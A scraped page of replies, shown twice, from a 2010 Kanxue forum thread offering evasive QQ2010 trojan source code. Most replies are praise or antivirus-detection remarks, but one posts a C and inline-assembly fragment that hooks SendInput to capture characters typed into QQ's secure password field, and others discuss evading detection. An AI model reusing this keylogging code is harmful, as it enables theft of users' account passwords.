[原创]刚写完的QQ2010木马源码，绝对免杀（以加上讲解）-付费问答-看雪-安全社区|安全招聘|kanxue.com

[旧帖] [原创]刚写完的QQ2010木马源码，绝对免杀（以加上讲解） 0.00雪花

发表于: 2010-11-1 17:45 12328

[旧帖] [原创]刚写完的QQ2010木马源码，绝对免杀（以加上讲解） 0.00雪花

hmxiaowu

2010-11-1 17:45

12328

查看主题内容

收藏・33

免费・0

支持

最新回复 (146) ◀ 1 2 3 4 5 6 ▶
冰狐剑客雪币： 14 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	冰狐剑客 76 楼谢谢你的分享哦！ 2010-11-2 18:47 0
小点雪币： 75 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 29 粉丝 0 关注私信	小点 77 楼哇是VC写的吧不错啊强大呵呵 2010-11-2 18:47 0
azilljy 雪币： 20 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 32 粉丝 0 关注私信	azilljy 78 楼代码只对WIN7系统有效,XP暂不支持 2010-11-2 19:03 0
itoby 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	itoby 79 楼 LZ 稍后给我买个邀请码 2010-11-2 22:18 0
hezhang 雪币： 677 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 123 粉丝 0 关注私信	hezhang 80 楼这东西开源不和谐吧 2010-11-2 23:08 0
杨建风雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	杨建风 81 楼虽然看不懂，但是支持楼主的原创和无私的精神 2010-11-3 01:13 0
踏雪流云雪币： 440 活跃值： (119) 能力值： ( LV6，RANK：80 ) 在线值：发帖 9 回帖 221 粉丝 0 关注私信	踏雪流云 1 82 楼如果快速方法没有找到，搜索整个盘会使硬盘狂转的，一下就被发现了。。。为啥不查找注册表呢？ 2010-11-3 10:43 0
刘觐肇雪币： 119 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 149 粉丝 0 关注私信	刘觐肇 83 楼还热乎着呢～～～～～ 2010-11-3 10:56 0
刘觐肇雪币： 119 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 149 粉丝 0 关注私信	刘觐肇 84 楼正是时候，还热乎着呢～～～～～ 2010-11-3 10:56 0
cec 雪币： 42 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 13 粉丝 0 关注私信	cec 85 楼楼主XP的有了吗？ 2010-11-3 11:13 0
zhzhhach 雪币： 298 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	zhzhhach 86 楼盲目顶贴者路过。。。 2010-11-3 11:45 0
LEON赵刚雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	LEON赵刚 87 楼强人 2010-11-3 11:48 0
langxiaotx 雪币： 7 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	langxiaotx 88 楼这个比较有兴趣，看看！ 2010-11-3 11:57 0
老许之雪币： 65 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 91 粉丝 0 关注私信	老许之 89 楼这个是用C写的。漠视win32汇编 2010-11-3 12:17 0
踏雪流云雪币： 440 活跃值： (119) 能力值： ( LV6，RANK：80 ) 在线值：发帖 9 回帖 221 粉丝 0 关注私信	踏雪流云 1 90 楼我测试的win7版，TSSafeEd返回地址不同：0012FA20 \|01CB70D5 返回到 TSSafeEd.01CB70D5 来自 TSSafeEd.01CB7C9C；保存输入字符的栈地址不同：0012FAB0 \|00000041；硬编码地址，不靠谱呀~~~ 2010-11-3 12:52 0
majinxin 雪币： 163 活跃值： (75) 能力值： ( LV3，RANK：30 ) 在线值：发帖 8 回帖 130 粉丝 1 关注私信	majinxin 91 楼看到红头文字。。先不管三七二十一来回复一下。。开源是好事。。顶！！！！！！！ 2010-11-3 13:13 0
hmxiaowu 雪币： 39 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 12 粉丝 0 关注私信	hmxiaowu 92 楼他的高地址要变，低地址位始终没变过，我测试了几天的.结果，都是高地址变了，低地址始终是那个。 2010-11-3 13:54 0
踏雪流云雪币： 440 活跃值： (119) 能力值： ( LV6，RANK：80 ) 在线值：发帖 9 回帖 221 粉丝 0 关注私信	踏雪流云 1 93 楼搞了一个通用版的，测试了win7和xp sp3 DWORD nRetAddress=0; static DWORD dwTSSafeEdit=(DWORD)GetModuleHandle(TEXT("TSSafeEdit.dat")); _asm { push eax mov eax,0 mov eax,[ebp+4] mov nRetAddress,eax pop eax } UINT nRet=0; HookOff(); nRet=SendInput(nInputs,pInputs,cbSize); HookOn(); if(nRetAddress-dwTSSafeEdit>0x16000\|\|nRetAddress<dwTSSafeEdit)//返回地址不在TSSafeEdit中 { char key=0; _asm { push eax push ebx mov eax,0 mov ebx,[ebp+0x44]//[ebp+0x44]存放的是字符指针 mov al,[ebx] mov key,al pop ebx pop eax } 2010-11-3 14:08 0
wwlai 雪币： 117 活跃值： (102) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 80 粉丝 0 关注私信	wwlai 94 楼 360报毒了 2010-11-3 14:46 0
azilljy 雪币： 20 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 32 粉丝 0 关注私信	azilljy 95 楼厉害!通用版地址代码确实好使! 2010-11-3 14:49 0
银san 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	银san 96 楼不管怎样，开源的是要支持的，来学习一下！ 2010-11-3 15:06 0
jhui 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	jhui 97 楼哇。。临时会员也可以发言了。嘻嘻。顶lz一个 2010-11-3 15:09 0
lapcca 雪币： 362 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 91 粉丝 0 关注私信	lapcca 98 楼我也来蹭个热闹！！！！！！ 2010-11-3 16:02 0
licyong 雪币： 197 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 121 粉丝 0 关注私信	licyong 99 楼虽然不懂~但是感觉lz很强~ 2010-11-3 16:48 0
小P孩儿雪币： 23 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 483 粉丝 0 关注私信	小P孩儿 100 楼 360杀的是寂寞… 2010-11-3 16:52 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

hmxiaowu

发帖

回帖

RANK

关注

私信

他的文章

[原创]刚写完的QQ2010木马源码，绝对免杀（以加上讲解） 12328

关于我们

联系我们

企业服务

看雪公众号

最新回复 (146) ◀ 1 2 3 4 5 6 ▶
冰狐剑客雪币： 14 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	冰狐剑客 76 楼谢谢你的分享哦！ 2010-11-2 18:47 0
小点雪币： 75 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 29 粉丝 0 关注私信	小点 77 楼哇是VC写的吧不错啊强大呵呵 2010-11-2 18:47 0
azilljy 雪币： 20 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 32 粉丝 0 关注私信	azilljy 78 楼代码只对WIN7系统有效,XP暂不支持 2010-11-2 19:03 0
itoby 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	itoby 79 楼 LZ 稍后给我买个邀请码 2010-11-2 22:18 0
hezhang 雪币： 677 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 123 粉丝 0 关注私信	hezhang 80 楼这东西开源不和谐吧 2010-11-2 23:08 0
杨建风雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	杨建风 81 楼虽然看不懂，但是支持楼主的原创和无私的精神 2010-11-3 01:13 0
踏雪流云雪币： 440 活跃值： (119) 能力值： ( LV6，RANK：80 ) 在线值：发帖 9 回帖 221 粉丝 0 关注私信	踏雪流云 1 82 楼如果快速方法没有找到，搜索整个盘会使硬盘狂转的，一下就被发现了。。。为啥不查找注册表呢？ 2010-11-3 10:43 0
刘觐肇雪币： 119 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 149 粉丝 0 关注私信	刘觐肇 83 楼还热乎着呢～～～～～ 2010-11-3 10:56 0
刘觐肇雪币： 119 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 149 粉丝 0 关注私信	刘觐肇 84 楼正是时候，还热乎着呢～～～～～ 2010-11-3 10:56 0
cec 雪币： 42 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 13 粉丝 0 关注私信	cec 85 楼楼主XP的有了吗？ 2010-11-3 11:13 0
zhzhhach 雪币： 298 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	zhzhhach 86 楼盲目顶贴者路过。。。 2010-11-3 11:45 0
LEON赵刚雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	LEON赵刚 87 楼强人 2010-11-3 11:48 0
langxiaotx 雪币： 7 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	langxiaotx 88 楼这个比较有兴趣，看看！ 2010-11-3 11:57 0
老许之雪币： 65 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 91 粉丝 0 关注私信	老许之 89 楼这个是用C写的。漠视win32汇编 2010-11-3 12:17 0
踏雪流云雪币： 440 活跃值： (119) 能力值： ( LV6，RANK：80 ) 在线值：发帖 9 回帖 221 粉丝 0 关注私信	踏雪流云 1 90 楼我测试的win7版，TSSafeEd返回地址不同：0012FA20 \|01CB70D5 返回到 TSSafeEd.01CB70D5 来自 TSSafeEd.01CB7C9C；保存输入字符的栈地址不同：0012FAB0 \|00000041；硬编码地址，不靠谱呀~~~ 2010-11-3 12:52 0
majinxin 雪币： 163 活跃值： (75) 能力值： ( LV3，RANK：30 ) 在线值：发帖 8 回帖 130 粉丝 1 关注私信	majinxin 91 楼看到红头文字。。先不管三七二十一来回复一下。。开源是好事。。顶！！！！！！！ 2010-11-3 13:13 0
hmxiaowu 雪币： 39 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 12 粉丝 0 关注私信	hmxiaowu 92 楼他的高地址要变，低地址位始终没变过，我测试了几天的.结果，都是高地址变了，低地址始终是那个。 2010-11-3 13:54 0
踏雪流云雪币： 440 活跃值： (119) 能力值： ( LV6，RANK：80 ) 在线值：发帖 9 回帖 221 粉丝 0 关注私信	踏雪流云 1 93 楼搞了一个通用版的，测试了win7和xp sp3 DWORD nRetAddress=0; static DWORD dwTSSafeEdit=(DWORD)GetModuleHandle(TEXT("TSSafeEdit.dat")); _asm { push eax mov eax,0 mov eax,[ebp+4] mov nRetAddress,eax pop eax } UINT nRet=0; HookOff(); nRet=SendInput(nInputs,pInputs,cbSize); HookOn(); if(nRetAddress-dwTSSafeEdit>0x16000\|\|nRetAddress<dwTSSafeEdit)//返回地址不在TSSafeEdit中 { char key=0; _asm { push eax push ebx mov eax,0 mov ebx,[ebp+0x44]//[ebp+0x44]存放的是字符指针 mov al,[ebx] mov key,al pop ebx pop eax } 2010-11-3 14:08 0
wwlai 雪币： 117 活跃值： (102) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 80 粉丝 0 关注私信	wwlai 94 楼 360报毒了 2010-11-3 14:46 0
azilljy 雪币： 20 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 32 粉丝 0 关注私信	azilljy 95 楼厉害!通用版地址代码确实好使! 2010-11-3 14:49 0
银san 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	银san 96 楼不管怎样，开源的是要支持的，来学习一下！ 2010-11-3 15:06 0
jhui 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	jhui 97 楼哇。。临时会员也可以发言了。嘻嘻。顶lz一个 2010-11-3 15:09 0
lapcca 雪币： 362 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 91 粉丝 0 关注私信	lapcca 98 楼我也来蹭个热闹！！！！！！ 2010-11-3 16:02 0
licyong 雪币： 197 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 121 粉丝 0 关注私信	licyong 99 楼虽然不懂~但是感觉lz很强~ 2010-11-3 16:48 0
小P孩儿雪币： 23 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 483 粉丝 0 关注私信	小P孩儿 100 楼 360杀的是寂寞… 2010-11-3 16:52 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复